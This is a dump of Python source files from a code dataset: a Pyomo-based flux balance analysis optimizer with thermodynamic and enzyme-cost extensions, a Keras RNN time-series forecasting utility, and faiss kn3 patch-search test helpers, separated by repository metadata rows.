    # maximise or minimise a linear flux objective subject to steady-state
    # mass balance.
    def __init__(self, model, objective, direction, flux_bounds, preset_fluxes, irr_reactions, excluded_mb):
        '''
        Parameters
        model: Model
            model that calls FBAOptimizer
        objective: dict
            reaction ID => coefficient in the objective expression
        direction: str
            direction of optimization
        flux_bounds: tuple
            lower and upper bounds of metabolic flux
        preset_fluxes: dict
            rxnid => float, fixed metabolic fluxes
        irr_reactions: list
            irreversible reactions
        excluded_mb: list
            metabolites excluded from mass balance constraints
        '''
        self.model = model
        self.objective = objective
        self.direction = direction
        self.flux_bounds = flux_bounds
        self.irr_reactions = irr_reactions
        # When an irreversible-reaction list is given, stamp reversibility
        # onto the model's reactions; otherwise derive the list from the
        # reactions already flagged irreversible.
        if self.irr_reactions is not None:
            for rxnid, rxn in self.model.reactions.items():
                if rxnid in self.irr_reactions:
                    rxn.rev = False
                else:
                    rxn.rev = True
        else:
            self.irr_reactions = [rxnid for rxnid, rxn in self.model.reactions.items() if rxn.rev == False]
        self.preset_fluxes = preset_fluxes
        self.excluded_mb = [] if excluded_mb is None else excluded_mb
        # Pyomo model with index sets taken from the stoichiometric matrix:
        # columns are reaction (flux) IDs, rows are metabolite IDs.
        self.pyoModel = ConcreteModel()
        self.pyoModel.fluxIDs = Set(initialize = self.model.stoichiometric_matrix.columns)
        self.pyoModel.metabIDs = Set(initialize = self.model.stoichiometric_matrix.index)
    def _build_flux_variables(self):
        # Declare one flux variable per reaction.  Irreversible reactions get
        # a non-negative lower bound; preset fluxes are pinned by setting
        # both bounds to the preset value.
        if self.preset_fluxes is None:
            def flux_bounds_rule(model, rxnid):
                if rxnid in self.irr_reactions:
                    return (max(0, self.flux_bounds[0]), self.flux_bounds[1])
                else:
                    return self.flux_bounds
            self.pyoModel.fluxes = Var(self.pyoModel.fluxIDs, bounds = flux_bounds_rule)
        else:
            def flux_bounds_rule(model, rxnid):
                if rxnid in self.preset_fluxes: # set the bounds of fixed fluxes
                    return (self.preset_fluxes[rxnid],)*2
                elif rxnid in self.irr_reactions:
                    return (max(0, self.flux_bounds[0]), self.flux_bounds[1])
                else:
                    return self.flux_bounds
            self.pyoModel.fluxes = Var(self.pyoModel.fluxIDs, bounds = flux_bounds_rule)
    def _build_objective(self):
        # Linear objective: sum of coefficient * flux over the reactions
        # named in self.objective, maximised or minimised per direction.
        for k in self.objective:
            if k not in self.model.reactions:
                raise KeyError('use valid reaction IDs in objective')
        if self.direction.lower() == 'max':
            direction = maximize
        elif self.direction.lower() == 'min':
            direction = minimize
        else:
            raise ValueError("only 'max' or 'min' is acceptable")
        def obj_rule(model):
            return sum(coe*model.fluxes[rxnid] for rxnid, coe in self.objective.items())
        self.pyoModel.obj = Objective(rule = obj_rule, sense = direction)
    def _build_mass_balance_contraints(self):
        # Steady state: S * v == 0 for every balanced metabolite.
        def mb_rule(model, metabid):
            stoyMat = self.model.stoichiometric_matrix
            return sum(stoyMat.loc[metabid, rxnid]*model.fluxes[rxnid] for rxnid in stoyMat.columns) == 0
        self.pyoModel.MBcstrs = Constraint(self.pyoModel.metabIDs, rule = mb_rule)
        # end metabolites and metabolites in excluded_mb are not balanced
        for metabid in self.pyoModel.metabIDs:
            if metabid in self.model.end_metabolites or metabid in self.excluded_mb:
                self.model.metabolites[metabid].is_constrained_by_mass_balance = False
                self.pyoModel.MBcstrs[metabid].deactivate()
    def solve(self):
        # Assemble the LP, solve with GLPK, and collect the optimal
        # objective value and flux distribution into an FBAResults object.
        self._build_flux_variables()
        self._build_objective()
        self._build_mass_balance_contraints()
        solver = SolverFactory('glpk')
        solver.solve(self.pyoModel)
        optObj = value(self.pyoModel.obj)
        optFluxes = {}
        for rxnid in self.pyoModel.fluxes:
            optFluxes[rxnid] = value(self.pyoModel.fluxes[rxnid])
        return FBAResults(optObj, optFluxes)
class TFBAOptimizer(FBAOptimizer):
    # Thermodynamics-constrained FBA: extends the FBA LP with log
    # metabolite concentration variables and the constraint that every
    # flux runs in the direction of negative Gibbs energy (solved as an
    # NLP with Ipopt).
    def __init__(self, model, objective, direction, flux_bounds, conc_bounds, preset_fluxes, preset_concs,
            irr_reactions, excluded_concs, excluded_mb, excluded_thmd):
        '''
        Parameters
        model: Model
            model that calls FBAOptimizer
        objective: dict
            reaction ID => coefficient in the objective expression
        direction: str
            direction of optimization
        flux_bounds: tuple
            lower and upper bounds of metabolic flux
        conc_bounds: tuple
            lower and upper bounds of metabolite concentration
        preset_fluxes: dict
            rxnid => float, fixed metabolic fluxes
        preset_concs: dict
            metabid => float, fixed metabolite concentration
        irr_reactions: list
            irreversible reactions
        excluded_concs: list
            metabolite concentrations excluded from optimization
        excluded_mb: list
            metabolites excluded from mass balance constraints
        excluded_thmd: list
            metabolites excluded from thermodynamics constraints
        '''
        super().__init__(model, objective, direction, flux_bounds, preset_fluxes, irr_reactions, excluded_mb)
        self.conc_bounds = conc_bounds
        # Concentrations are optimised in log space.
        self.lnconc_bounds = tuple(np.log(self.conc_bounds))
        self.preset_concs = preset_concs
        self.excluded_thmd = [] if excluded_thmd is None else excluded_thmd
        self.excluded_concs = [] if excluded_concs is None else excluded_concs
        self.pyoModel.inMetabIDs = Set(initialize = [metabid for metabid in self.model.metabolites
                                                     if metabid.lower() != 'biomass' and
                                                     not self._is_exch_metab(metabid) and
                                                     not self._is_excluded_conc(metabid)]) # exclude biomass, exchange metabolites, and metabolites excluded from optimization
        self.pyoModel.influxIDs = Set(initialize = [rxnid for rxnid, rxn in self.model.reactions.items()
                                                    if not rxn.is_biomass_formation and
                                                    not rxn.is_exchange]) # exclude biomass formation and exchange reactions
    def _is_exch_metab(self, metabid):
        # Exchange metabolites carry an '.o' (outside) compartment suffix.
        return True if re.match(r'^[\w\._]+\.o$', metabid) else False
    def _is_excluded_conc(self, metabid):
        # Strip the compartment suffix before checking the exclusion list.
        return re.sub(r'(.+)\..+$', '\g<1>', metabid).lower() in self.excluded_concs
    def _build_conc_variables(self):
        # Declare log-concentration variables; preset concentrations are
        # pinned by collapsing their bounds to a single (log) value.
        if self.preset_concs is None:
            self.pyoModel.lnconcs = Var(self.pyoModel.inMetabIDs, bounds = self.lnconc_bounds)
        else:
            def conc_bounds_rule(model, metabid):
                if metabid in self.preset_concs: # set the bounds of fixed concentrations
                    return (np.log(self.preset_concs[metabid]),)*2
                else:
                    return self.lnconc_bounds
            self.pyoModel.lnconcs = Var(self.pyoModel.inMetabIDs, bounds = conc_bounds_rule)
    def _calculate_gibbs_energy(self, model, rxnid):
        '''
        Parameters
        model: pyomo model
            pyomo model
        rxnid: str
            reaction ID
        '''
        # dG' = dG'm + R*T*ln(prod(products)/prod(substrates)), built from
        # the reaction stoichiometry and the log-concentration variables.
        subs = self.model.reactions[rxnid].substrates
        pros = self.model.reactions[rxnid].products
        subsSum = sum([subs[subid].coe*model.lnconcs[subid] for subid in subs if not self._is_excluded_conc(subid)])
        prosSum = sum([pros[proid].coe*model.lnconcs[proid] for proid in pros if not self._is_excluded_conc(proid)])
        return self.model.reactions[rxnid].dgpm + (prosSum - subsSum)*R*T
    def _build_thermodynamics_constraints(self):
        # Second law coupling: flux and Gibbs energy may not have the same
        # sign, i.e. v * dG' <= 0 for every constrained reaction.
        def thmd_rule(model, rxnid):
            return model.fluxes[rxnid]*self._calculate_gibbs_energy(model, rxnid) <= 0
        self.pyoModel.THMDcstr = Constraint(self.pyoModel.influxIDs, rule = thmd_rule)
        # reactions in excluded_thmd are excluded from thermodynamics constraints
        for rxnid in self.pyoModel.influxIDs:
            if rxnid in self.excluded_thmd:
                self.model.reactions[rxnid].is_constrained_by_thermodynamics = False
                self.pyoModel.THMDcstr[rxnid].deactivate()
    def solve(self):
        # Assemble the NLP, solve with Ipopt, and collect fluxes, log
        # concentrations and reaction Gibbs energies into a TFBAResults.
        self._build_flux_variables()
        self._build_conc_variables()
        self._build_objective()
        self._build_mass_balance_contraints()
        self._build_thermodynamics_constraints()
        solver = SolverFactory('ipopt')
        solver.options['max_iter']= maxIter
        solver.solve(self.pyoModel)
        optObj = value(self.pyoModel.obj)
        optFluxes = {}
        for rxnid in self.pyoModel.fluxes:
            optFluxes[rxnid] = value(self.pyoModel.fluxes[rxnid])
        optLnconcs = {}
        for metabid in self.pyoModel.lnconcs:
            optLnconcs[metabid] = value(self.pyoModel.lnconcs[metabid])
        optDgps = {}
        for rxnid in self.pyoModel.THMDcstr:
            optDgps[rxnid] = value(self._calculate_gibbs_energy(self.pyoModel, rxnid))
        return TFBAResults(optObj, optFluxes, optLnconcs, optDgps)
class ETFBAOptimizer(TFBAOptimizer):
    """Enzyme- plus thermodynamics-constrained FBA (ETFBA) optimizer.

    Extends TFBAOptimizer with enzyme protein cost (EPC) evaluation for the
    reactions listed in included_epc. Two modes are supported:
    * use_fba_results=True: fluxes are fixed to a precomputed FBA solution and
      the total EPC is minimized over metabolite concentrations only;
    * use_fba_results=False: fluxes and concentrations are optimized jointly,
      minimizing EPC per unit of the flux objective.
    """
    def __init__(self, model, objective, direction, flux_bounds, conc_bounds, preset_fluxes, preset_concs,
                 irr_reactions, excluded_concs, excluded_mb, excluded_thmd, included_epc, use_fba_results):
        '''
        Parameters
        model: Model
            model that calls FBAOptimizer
        objective: dict
            reaction ID => coefficient in the objective expression
        direction: str
            direction of optimization
        flux_bounds: tuple
            lower and upper bounds of metabolic flux
        conc_bounds: tuple
            lower and upper bounds of metabolite concentration
        preset_fluxes: dict
            rxnid => float, fixed metabolic fluxes
        preset_concs: dict
            metabid => float, fixed metabolite concentration
        irr_reactions: list
            irreversible reactions
        excluded_concs: list
            metabolite concentrations excluded from optimization
        excluded_mb: list
            metabolites excluded from mass balance constraints
        excluded_thmd: list
            reactions excluded from thermodynamics constraints
        included_epc: list
            reactions included in the enzyme protein cost constraints
            (the previous docstring incorrectly said "excluded from")
        use_fba_results: bool
            whether to use precomputed fluxes by FBA
        '''
        super().__init__(model, objective, direction, flux_bounds, conc_bounds, preset_fluxes, preset_concs,
                         irr_reactions, excluded_concs, excluded_mb, excluded_thmd)
        self.included_epc = included_epc
        self.use_fba_results = use_fba_results
    @staticmethod
    def _get_real(value, default):
        """Return value, or default when value is NaN.

        Bug fix: the original used ``value is not np.nan``, an identity check
        that only recognizes the np.nan singleton itself; NaNs produced
        elsewhere (float('nan'), numpy arithmetic results) slipped through.
        np.isnan() detects any NaN regardless of origin.
        """
        try:
            if np.isnan(value):
                return default
        except TypeError:
            pass    # non-numeric values are passed through unchanged
        return value
    def _check_included_epc(self):
        """Raise ValueError if included_epc contains a biomass-formation or exchange reaction."""
        for rxnid in self.included_epc:
            if self.model.reactions[rxnid].is_biomass_formation:
                raise ValueError("biomass formation can't be included in enzyme protein cost")
            if self.model.reactions[rxnid].is_exchange:
                raise ValueError("exchange reaction %s can't be included in enzyme protein cost" % rxnid)
    def _calculate_enzyme_cost(self, model, rxnids):
        '''
        Build the enzyme protein cost expression for each reaction.

        Parameters
        model: pyomo model
            pyomo model
        rxnids: list
            reaction IDs

        Returns
        costs: list
            one cost expression per reaction in rxnids, in the same order
        '''
        costs = []
        for rxnid in rxnids:
            rxn = self.model.reactions[rxnid]
            v = model.fluxes[rxnid]
            # fall back to defaults when kinetic/physical parameters are missing
            fkcat = self._get_real(rxn.fkcat, defaultKcat)
            mw = self._get_real(rxn.mw, defaultMW)
            dgpm = rxn.dgpm
            subs = rxn.substrates
            pros = rxn.products
            # stoichiometry-weighted sums of log-Km and log-concentration,
            # skipping metabolites excluded from concentration optimization
            subsKmSum = sum([subs[subid].coe*log(self._get_real(self.model.metabolites[subid].kms[rxnid], defaultKm))
                             for subid in subs if not self._is_excluded_conc(subid)])
            prosKmSum = sum([pros[proid].coe*log(self._get_real(self.model.metabolites[proid].kms[rxnid], defaultKm))
                             for proid in pros if not self._is_excluded_conc(proid)])
            subsConcSum = sum([subs[subid].coe*model.lnconcs[subid] for subid in subs if not self._is_excluded_conc(subid)])
            prosConcSum = sum([pros[proid].coe*model.lnconcs[proid] for proid in pros if not self._is_excluded_conc(proid)])
            # enzyme demand e from a reversible rate law: flux over kcat, scaled by a
            # saturation term and a thermodynamic driving-force term
            #e = v/fkcat*(1 + exp(subsKmSum - subsConcSum))/(1 - exp(prosConcSum - subsConcSum + dgpm/R/T))
            e = v/fkcat*(exp(subsConcSum - subsKmSum) + exp(prosConcSum - prosKmSum) + 1)/(exp(subsConcSum - subsKmSum)*(1 - exp(prosConcSum - subsConcSum + dgpm/R/T)))
            # 1/3600 presumably converts between per-hour fluxes and per-second
            # kcat units -- TODO confirm the unit convention
            costs.append(1/3600*mw*e)
        return costs
    def _build_flux_parameters(self):
        """Fix the fluxes as pyomo Params initialized from a plain FBA solution."""
        fbaFluxes = FBAOptimizer(self.model, self.objective, self.direction, self.flux_bounds, self.preset_fluxes,
                                 self.irr_reactions, self.excluded_mb).solve().opt_fluxes
        self.pyoModel.fluxes = Param(self.pyoModel.fluxIDs, initialize = fbaFluxes)
    def _build_objective_without_fluxes(self):
        """Objective for fixed fluxes: minimize the total enzyme protein cost."""
        self._check_included_epc()
        def obj_rule(model):
            return sum(self._calculate_enzyme_cost(model, self.included_epc))
        self.pyoModel.obj = Objective(rule = obj_rule, sense = minimize) # always minimize the objective
    def _build_objective_with_fluxes(self):
        """Objective for free fluxes: minimize enzyme protein cost per unit of flux objective."""
        for k in self.objective:
            if k not in self.model.reactions:
                raise KeyError('use valid reaction IDs in objective')
        self._check_included_epc()
        def obj_rule(model):
            flux_obj = sum(coe*model.fluxes[rxnid] for rxnid, coe in self.objective.items())
            epc_obj = sum(self._calculate_enzyme_cost(model, self.included_epc))
            return epc_obj/flux_obj
        self.pyoModel.obj = Objective(rule = obj_rule, sense = minimize) # always minimize the objective
    def _build_thermodynamics_constraints_without_fluxes(self):
        """Sign-aware Gibbs-energy constraints for fixed (Param) fluxes.

        With fixed fluxes the flux direction is known at model-build time, so
        each constraint directly requires dG' <= 0 for forward flux or
        dG' >= 0 for backward flux.
        """
        def thmd_rule(model, rxnid):
            if model.fluxes[rxnid] >= 0:
                return self._calculate_gibbs_energy(model, rxnid) <= 0
            else:
                return self._calculate_gibbs_energy(model, rxnid) >= 0
        self.pyoModel.THMDcstr = Constraint(self.pyoModel.influxIDs, rule = thmd_rule)
        # reactions in excluded_thmd are excluded from thermodynamics constraints
        for rxnid in self.pyoModel.influxIDs:
            if rxnid in self.excluded_thmd:
                self.model.reactions[rxnid].is_constrained_by_thermodynamics = False
                self.pyoModel.THMDcstr[rxnid].deactivate()
    def solve(self):
        """Assemble and solve the ETFBA problem with IPOPT; return ETFBAResults."""
        if self.use_fba_results:
            # fluxes fixed by FBA: only concentrations are decision variables
            self._build_flux_parameters()
            self._build_conc_variables()
            self._build_objective_without_fluxes()
            self._build_thermodynamics_constraints_without_fluxes()
        else:
            # joint optimization of fluxes and concentrations
            self._build_flux_variables()
            self._build_conc_variables()
            self._build_objective_with_fluxes()
            self._build_mass_balance_contraints()
            self._build_thermodynamics_constraints()
        solver = SolverFactory('ipopt')
        solver.options['max_iter'] = maxIter
        solver.solve(self.pyoModel)
        # report the flux objective regardless of which objective was optimized
        optObj = value(sum(coe*self.pyoModel.fluxes[rxnid] for rxnid, coe in self.objective.items()))
        optFluxes = {rxnid: value(self.pyoModel.fluxes[rxnid])
                     for rxnid in self.pyoModel.fluxes}
        optLnconcs = {metabid: value(self.pyoModel.lnconcs[metabid])
                      for metabid in self.pyoModel.lnconcs}
        optDgps = {rxnid: value(self._calculate_gibbs_energy(self.pyoModel, rxnid))
                   for rxnid in self.pyoModel.THMDcstr}
        ecosts = self._calculate_enzyme_cost(self.pyoModel, self.included_epc)
        optTotalEcost = value(sum(ecosts))
        optEcosts = {rxnid: value(cost) for rxnid, cost in zip(self.included_epc, ecosts)}
        return ETFBAResults(optObj, optFluxes, optLnconcs, optDgps, optTotalEcost, optEcosts)
| 7,583 | 7,052 | 69 |
c5d6bf89e462376e078860e14efcafac35041ceb | 7,921 | py | Python | dynamicgem/utils/ts_utils.py | Sujit-O/dyngem | a879bf362d1e9409faa4e1186c345337ad6d0189 | [
"MIT"
] | null | null | null | dynamicgem/utils/ts_utils.py | Sujit-O/dyngem | a879bf362d1e9409faa4e1186c345337ad6d0189 | [
"MIT"
] | null | null | null | dynamicgem/utils/ts_utils.py | Sujit-O/dyngem | a879bf362d1e9409faa4e1186c345337ad6d0189 | [
"MIT"
] | null | null | null | import numpy as np
from keras import backend as K
from keras.models import Sequential
from keras.layers import Dense, Bidirectional, LSTM, GRU
from keras.optimizers import Adam
from keras.callbacks import EarlyStopping
from keras.layers import Conv1D, MaxPooling1D
from time import time
import pandas as pd
# convert an array of values into a dataset matrix
| 38.451456 | 89 | 0.562681 | import numpy as np
from keras import backend as K
from keras.models import Sequential
from keras.layers import Dense, Bidirectional, LSTM, GRU
from keras.optimizers import Adam
from keras.callbacks import EarlyStopping
from keras.layers import Conv1D, MaxPooling1D
from time import time
import pandas as pd
def construct_rnn_model(look_back,
                        d,
                        n_units=None,
                        dense_units=None,
                        filters=64,
                        kernel_size=5,
                        pool_size=4,
                        method='sgru',
                        bias_reg=None,
                        input_reg=None,
                        recurr_reg=None):
    """Build and compile a Keras sequence-to-vector regression model.

    Parameters
    ----------
    look_back : int
        number of past timesteps in each input sample
    d : int
        feature dimension per timestep (also the output dimension)
    n_units : list of int, optional
        units per recurrent layer (default [20, 20])
    dense_units : list of int, optional
        units per trailing dense layer (default [50, 10])
    filters, kernel_size, pool_size : int
        Conv1D/MaxPooling1D settings for the *-cnn variants
    method : str
        architecture selector: 'lstm', 'gru', 'bi-lstm', 'bi-gru',
        'lstm-cnn', 'gru-cnn', 'bi-lstm-cnn', 'bi-gru-cnn'
    bias_reg, input_reg, recurr_reg
        Keras regularizers; NOTE(review): only the plain 'lstm'/'gru'
        branches apply them -- the bi-* and *-cnn branches ignore them.

    Returns
    -------
    keras.models.Sequential
        compiled model with mean squared error loss

    Notes
    -----
    NOTE(review): the default method 'sgru' matches no branch, yielding a
    model with only dense layers; likewise the 'plstm' compile branch is
    unreachable with the methods listed above -- confirm intent.
    """
    # Bug fix: mutable default arguments ([20, 20], [50, 10]) are shared across
    # calls; use None sentinels and create fresh lists inside the function.
    if n_units is None:
        n_units = [20, 20]      # previously experimented with [500, 500]
    if dense_units is None:
        dense_units = [50, 10]  # previously [1000, 200, 50, 10]
    model = Sequential()
    if method == 'lstm':
        model.add(LSTM(n_units[0],
                       input_shape=(look_back, d),
                       return_sequences=True,
                       bias_regularizer=bias_reg,
                       kernel_regularizer=input_reg,
                       recurrent_regularizer=recurr_reg))
        for n_unit in n_units[1:]:
            model.add(LSTM(n_unit,
                           bias_regularizer=bias_reg,
                           kernel_regularizer=input_reg,
                           recurrent_regularizer=recurr_reg))
    elif method == 'gru':
        model.add(GRU(n_units[0],
                      input_shape=(look_back, d),
                      return_sequences=True,
                      bias_regularizer=bias_reg,
                      kernel_regularizer=input_reg,
                      recurrent_regularizer=recurr_reg))
        for n_unit in n_units[1:]:
            model.add(GRU(n_unit,
                          bias_regularizer=bias_reg,
                          kernel_regularizer=input_reg,
                          recurrent_regularizer=recurr_reg))
    elif method == 'bi-lstm':
        model.add(Bidirectional(LSTM(n_units[0],
                                     input_shape=(look_back, d),
                                     return_sequences=True)))
        for n_unit in n_units[1:]:
            model.add(Bidirectional(LSTM(n_unit)))
    elif method == 'bi-gru':
        model.add(Bidirectional(GRU(n_units[0],
                                    input_shape=(look_back, d),
                                    return_sequences=True)))
        for n_unit in n_units[1:]:
            model.add(Bidirectional(GRU(n_unit)))
    elif method == 'lstm-cnn':
        # Conv1D + pooling front end before the recurrent stack
        model.add(Conv1D(filters,
                         kernel_size,
                         input_shape=(look_back, d),
                         padding='valid',
                         activation='relu',
                         strides=1))
        model.add(MaxPooling1D(pool_size=pool_size))
        model.add(LSTM(n_units[0],
                       return_sequences=True))
        for n_unit in n_units[1:]:
            model.add(LSTM(n_unit))
    elif method == 'gru-cnn':
        model.add(Conv1D(filters,
                         kernel_size,
                         input_shape=(look_back, d),
                         padding='valid',
                         activation='relu',
                         strides=1))
        model.add(MaxPooling1D(pool_size=pool_size))
        model.add(GRU(n_units[0],
                      return_sequences=True))
        for n_unit in n_units[1:]:
            model.add(GRU(n_unit))
    elif method == 'bi-lstm-cnn':
        model.add(Conv1D(filters,
                         kernel_size,
                         input_shape=(look_back, d),
                         padding='valid',
                         activation='relu',
                         strides=1))
        model.add(MaxPooling1D(pool_size=pool_size))
        model.add(Bidirectional(LSTM(n_units[0],
                                     return_sequences=True)))
        # NOTE(review): subsequent layers are plain LSTM, not Bidirectional --
        # confirm whether this asymmetry is intentional
        for n_unit in n_units[1:]:
            model.add(LSTM(n_unit))
    elif method == 'bi-gru-cnn':
        model.add(Conv1D(filters,
                         kernel_size,
                         input_shape=(look_back, d),
                         padding='valid',
                         activation='relu',
                         strides=1))
        model.add(MaxPooling1D(pool_size=pool_size))
        model.add(Bidirectional(GRU(n_units[0],
                                    return_sequences=True)))
        for n_unit in n_units[1:]:
            model.add(GRU(n_unit))
    # trailing fully-connected head ending in a d-dimensional linear output
    for dense_n_unit in dense_units:
        model.add(Dense(dense_n_unit, activation='relu'))
    model.add(Dense(d))
    if 'plstm' in method:
        adam = Adam(lr=1e-4, beta_1=0.9, beta_2=0.999, epsilon=1e-08)
        model.compile(loss='mean_squared_error', optimizer=adam)
    else:
        model.compile(loss='mean_squared_error', optimizer='adam')
    return model
# convert an array of values into a dataset matrix
def create_training_samples(graphs, look_back=5, d=2):
    """Build supervised (X, y) samples from a time-indexed table via a sliding window.

    Parameters
    ----------
    graphs : pandas.DataFrame
        one row per timestep; must support .iloc row indexing
    look_back : int
        number of past timesteps that form each input sample
    d : int
        feature dimension (number of columns copied per timestep)

    Returns
    -------
    trainX : np.ndarray, shape (len(graphs) - look_back, look_back, d)
    trainY : np.ndarray, shape (len(graphs) - look_back, d)
        the row immediately following each window
    """
    T = len(graphs)
    train_size = T - look_back
    trainX = np.zeros((train_size, look_back, d))
    trainY = np.zeros((train_size, d))
    n_samples_train = 0
    for t in range(T - look_back):
        for tau in range(look_back):
            # Bug fix: the original indexed a nonexistent global `ts_train`
            # instead of the `graphs` argument, raising NameError when called.
            trainX[n_samples_train, tau, :] = graphs.iloc[t + tau, :]
        trainY[n_samples_train, :] = graphs.iloc[t + look_back, :]
        n_samples_train += 1
    return trainX, trainY
def learn_rnn_parameters(ts, ts_exogs, options, look_ahead=1,
                         train_start_date=None,
                         train_end_date=None, test_start_date=None,
                         save_plots=False, method='gru'):
    """Train an RNN on a time series (plus optional exogenous series) and
    forecast `look_ahead` daily values up to options.warn_start_date.

    Returns a pandas Series of non-negative predicted counts indexed at noon
    of each test date.

    NOTE(review): `test_start_date` defaults to None but is passed straight
    to pd.date_range below -- confirm callers always supply it.
    NOTE(review): `save_plots` is accepted but never used in this body.
    """
    # default the training window to the available data
    if train_start_date is None:
        if ts_exogs is None:
            train_start_date = ts.index.min()
        else:
            train_start_date = max(ts.index.min(), ts_exogs.index.min())
    if train_end_date is None:
        train_end_date = max(ts.index)
    # assumes options.warn_start_date is a date-like marking the forecast target -- TODO confirm
    test_end_date = options.warn_start_date + pd.Timedelta(days=look_ahead - 1)
    # dates between the end of training and the start of testing (exclusive of test start)
    # NOTE(review): `closed=` was removed in pandas 2.0 in favor of `inclusive=`
    gap_dates = pd.date_range(train_end_date + pd.Timedelta(days=1),
                              test_start_date, closed="left")
    test_dates = pd.date_range(test_start_date, test_end_date)
    gap_and_test_dates = gap_dates.append(test_dates)
    ts_train = ts[train_start_date: train_end_date]
    if ts_exogs is not None:
        ts_exogs_train = ts_exogs[train_start_date: train_end_date]
        # NOTE(review): ts_exogs_gap_test is computed but never used below
        ts_exogs_gap_test = ts_exogs[
            min(gap_and_test_dates):max(gap_and_test_dates)]
    else:
        ts_exogs_train = None
        ts_exogs_gap_test = None
    # training matrix: target series side-by-side with exogenous columns (if any)
    if ts_exogs_train is not None:
        ts_concat = pd.concat([ts_train, ts_exogs_train], axis=1)
    else:
        ts_concat = pd.DataFrame(ts_train)
    ts_concat = ts_concat.dropna(axis=0)
    look_back = 5
    d = len(ts_concat.columns)
    model = construct_rnn_model(look_back=look_back, d=d, method=method)
    early_stop = EarlyStopping(monitor='val_loss', patience=10, verbose=1)
    trainX, trainY = create_training_samples(
        ts_concat,
        look_back=look_back,
        d=d
    )
    t1 = time()
    # NOTE(review): `nb_epoch` is the legacy Keras 1.x spelling of `epochs`
    model.fit(trainX,
              trainY,
              nb_epoch=2000,
              batch_size=100,
              validation_split=0.2,
              callbacks=[early_stop],
              verbose=2)
    t2 = time()
    print('Training time: %fsec' % (t2 - t1))
    # roll the forecast forward one day at a time, feeding predictions back in
    forecast_length = len(gap_dates) + len(test_dates)
    predictions = []
    for pred_day in range(forecast_length):
        testX = np.array(ts_concat[-look_back:]).reshape((1, look_back, d))
        prediction = model.predict(testX, batch_size=100, verbose=0)
        # NOTE(review): DataFrame.append was removed in pandas 2.0 (use pd.concat)
        ts_concat = ts_concat.append(pd.DataFrame(prediction, columns=ts_concat.columns))
        predictions.append(prediction[0])
    print('Test time: %fsec' % (time() - t2))
    # keep only the test-window predictions of the first (target) column
    list_pred = np.array(predictions)[-len(test_dates):, 0]
    print("Last", look_ahead, "predictions:")
    print(list_pred)
    # index at noon of each test day; clamp negative forecasts to zero
    ts_pred = pd.Series(list_pred, index=test_dates + pd.Timedelta(hours=12))
    ts_pred[ts_pred < 0] = 0
    ts_pred.name = 'count'
    ts_pred.index.name = 'date'
    return ts_pred
44e4fc582229cc7f1dc265d8119e7fa52c25f0cd | 8,199 | py | Python | pytests/test_kn3_batching_topk.py | gauenk/faiss | f2b5891fb3dacb3caae862824bf72fa42ce77dca | [
"MIT"
] | null | null | null | pytests/test_kn3_batching_topk.py | gauenk/faiss | f2b5891fb3dacb3caae862824bf72fa42ce77dca | [
"MIT"
] | null | null | null | pytests/test_kn3_batching_topk.py | gauenk/faiss | f2b5891fb3dacb3caae862824bf72fa42ce77dca | [
"MIT"
] | null | null | null |
# -- python --
import cv2,tqdm,copy
import numpy as np
import unittest
import tempfile
import sys
from einops import rearrange
import shutil
from pathlib import Path
from easydict import EasyDict as edict
# -- vision --
from PIL import Image
# -- linalg --
import torch as th
import numpy as np
# -- package helper imports --
from faiss.contrib import kn3
from faiss.contrib import testing
# -- check if reordered --
from scipy import optimize
SAVE_DIR = Path("./output/tests/")
#
#
# -- Primary Testing Class --
#
#
PYTEST_OUTPUT = Path("./pytests/output/")
#
# -- Load Data --
#
#
# -- [Exec] Sim Search --
#
| 30.479554 | 92 | 0.56702 |
# -- python --
import cv2,tqdm,copy
import numpy as np
import unittest
import tempfile
import sys
from einops import rearrange
import shutil
from pathlib import Path
from easydict import EasyDict as edict
# -- vision --
from PIL import Image
# -- linalg --
import torch as th
import numpy as np
# -- package helper imports --
from faiss.contrib import kn3
from faiss.contrib import testing
# -- check if reordered --
from scipy import optimize
SAVE_DIR = Path("./output/tests/")
#
#
# -- Primary Testing Class --
#
#
PYTEST_OUTPUT = Path("./pytests/output/")
def save_image(burst,prefix="prefix"):
root = PYTEST_OUTPUT
if not(root.exists()): root.mkdir()
burst = rearrange(burst,'t c h w -> t h w c')
burst = np.clip(burst,0,255)
burst = burst.astype(np.uint8)
nframes = burst.shape[0]
for t in range(nframes):
fn = "%s_kn3_io_%02d.png" % (prefix,t)
img = Image.fromarray(burst[t])
path = str(root / fn)
img.save(path)
def get_empty_bufs(K,args,shape,device):
ps,pt = args.ps,args.pt
stride = args.queryStride
t,c,h,w = shape
return init_empty_bufs(K,stride,ps,pt,t,c,h,w,device)
def init_empty_bufs(k,stride,ps,pt,t,c,h,w,device):
nq = (t*h*w)//stride+1
cshape = (nq,k)
pshape = (nq,k,pt,c,ps,ps)
tf32,ti32 = th.float32,th.int32
bufs = edict()
bufs.patches = th.zeros(pshape,device=device,dtype=tf32)
bufs.dists = th.zeros(cshape,device=device,dtype=tf32)
bufs.inds = th.zeros(cshape,device=device,dtype=ti32)
return bufs
class TestBatchingTopKPatches(unittest.TestCase):
#
# -- Load Data --
#
def do_load_data(self,dname,sigma,device="cuda:0"):
# -- Read Data (Image & VNLB-C++ Results) --
clean = testing.load_dataset(dname).to(device)[:5]
clean = th.zeros((15,3,32,32)).to(device).type(th.float32)
clean = clean * 1.0
noisy = clean + sigma * th.normal(0,1,size=clean.shape,device=device)
return clean,noisy
def do_load_flow(self,comp_flow,burst,sigma,device):
if comp_flow:
# -- TV-L1 Optical Flow --
flow_params = {"nproc":0,"tau":0.25,"lambda":0.2,"theta":0.3,
"nscales":100,"fscale":1,"zfactor":0.5,"nwarps":5,
"epsilon":0.01,"verbose":False,"testing":False,'bw':True}
fflow,bflow = vnlb.swig.runPyFlow(burst,sigma,flow_params)
else:
# -- Empty shells --
t,c,h,w = burst.shape
tf32,tfl = th.float32,th.long
fflow = th.zeros(t,2,h,w,dtype=tf32,device=device)
bflow = fflow.clone()
# -- pack --
flows = edict()
flows.fflow = fflow
flows.bflow = bflow
return flows
def get_search_inds(self,index,bsize,stride,shape,device):
t,c,h,w = shape
start = index * bsize
stop = ( index + 1 ) * bsize
ti32 = th.int32
srch_inds = th.arange(start,stop,stride,dtype=ti32,device=device)[:,None]
srch_inds = kn3.get_3d_inds(srch_inds,h,w)
srch_inds = srch_inds.contiguous()
return srch_inds
def init_topk_shells(self,bsize,k,pt,c,ps,device):
tf32,ti32 = th.float32,th.int32
vals = float("inf") * th.ones((bsize,k),dtype=tf32,device=device)
inds = -th.ones((bsize,k),dtype=ti32,device=device)
patches = -th.ones((bsize,k,pt,c,ps,ps),dtype=tf32,device=device)
return vals,inds,patches
